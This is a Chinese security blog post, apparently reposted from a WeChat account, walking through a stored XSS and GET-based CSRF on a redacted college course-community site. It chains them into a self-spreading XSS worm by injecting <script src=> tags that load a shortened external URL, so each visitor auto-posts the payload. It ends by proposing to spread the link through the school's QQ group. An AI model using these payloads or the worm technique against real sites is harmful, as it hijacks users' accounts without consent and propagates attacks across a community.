【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

admin 2022年7月23日20:26:55评论28 views字数 968阅读3分13秒阅读模式

0x00 存储XSS

1) 可绕过的XSS

给大家分享个漏洞案例,今天上午刚把电脑修好
某技术学院储存XSS+CSRF(XSS绕过滤到蠕虫攻击)
注册处:http://xxx.edu.cn/meol/xxxx需要注册才能进入社区发表,先说下储存XSS,过滤了,发现可绕过
储存XSS:http://xxx.edu.cn/meol/xxx?genre=80&type=0

他是先过滤再输出,而不是输出时过滤,从而导致可绕过 

【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

我们发现他输入时就进行了过滤,直接替换<script>alert('XSS')</script>成功弹框:

【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)



0x01 CSRF配合XSS蠕虫

同样是这个位置,发表话题,改成get请求 

【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

得到连接:
CSRF:

http://xxx.edu.cn/meol/xxx?type=&studyCircleId=&saytext=%B9%FE%B9%FE

点击链接会自动发表内容
我们缩短一下链接 网上有在线缩短的,缩短后链接http://suo.im/abc
构造一下csrf连接:<script src=http://suo.im/abc></script>(插入到网页当中,当别人访问你的个人中心,会自动发表一个内容)
接着我们继续构造,找到CSRF漏洞处,把后面的内容替换为CSRF链接,也就是访问此连接会自动发表内容

http://xxx.edu.cn/meol/xxx?type=0&studyCircleId=&saytext=<script src=http://suo.im/xxx></script>

继续缩短网址:
缩短后:http://suo.im/XXXX这个时候我们再调用一下CSRF+XSS的地址:

<script src=http://suo.im/XXXX></script>

把这个链接插入到网页当中即可完成XSS蠕虫攻击
当A访问你的主页时,A会发表和你一样的内容,当B访问A的主页时,B会发表和A一样的内容,同理,完成XSS蠕虫攻击

【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

最后的思路就是自己构造个网站,加这个学校的QQ群,发送链接哈哈。

往期推荐 

// 1

(总结)绕过CDN查找真实IP

// 2

盘点那些Wifi破解姿势(2)

// 3

验证码绕过思路总结

// 4

一次实战挖掘软件逻辑漏洞

原文始发于微信公众号(雾晓安全):【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年7月23日20:26:55
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   【实战】储存XSS+CSRF(XSS绕过到蠕虫攻击)http://cn-sec.com/archives/1194483.html

发表评论

匿名网友 填写信息